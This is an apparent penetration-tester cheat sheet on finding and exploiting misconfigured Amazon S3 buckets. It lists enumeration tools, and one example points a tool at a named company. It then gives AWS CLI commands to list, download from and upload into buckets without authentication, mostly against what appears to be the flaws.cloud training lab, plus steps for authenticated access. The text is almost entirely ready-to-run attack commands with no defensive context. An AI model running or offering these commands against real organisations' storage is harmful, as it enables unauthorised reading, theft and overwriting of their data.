S3 Bucket Enumeration

Lazys3 - Ruby Script

GitHub - nahamsec/lazys3GitHub

• ruby lazys3.rb <company>

• ruby lazys3.rb pakwheels

---

Cloud_enum

• sudo apt install cloud-enum

• cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp

---

S3BucketList - Browser Extension

Manual Installation

GitHub - AlecBlance/S3BucketList: Chrome and Firefox extension that lists Amazon S3 Buckets while browsingGitHub

---

Exploiting S3 UnAuthenticated

• sudo apt-get install awscli

• cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp

• aws s3 ls s3://flaws.cloud/ --no-sign-request

• Download - aws s3 cp s3://flaws.cloud/secret.html ./ --no-sign-request

• Upload - aws s3 cp ./index.html s3://flaws.cloud/secret.html --no-sign-request

---

Exploiting S3 Authenticated

• Create a free AWS account

• Go to AWS IAM dashboard

• Users → Add New user with programmatic access credential type

• Once user is created, note down the access key and secret access key

• Click User → Permissions → Add permissions → Attach existing policies → AmazonS3FullAccess

• aws configure --profile someone

• aws s3 --profile someone ls s3://flaws.cloud/ --no-sign-request

• aws s3 --profile someone cp s3://flaws.cloud/something.html ./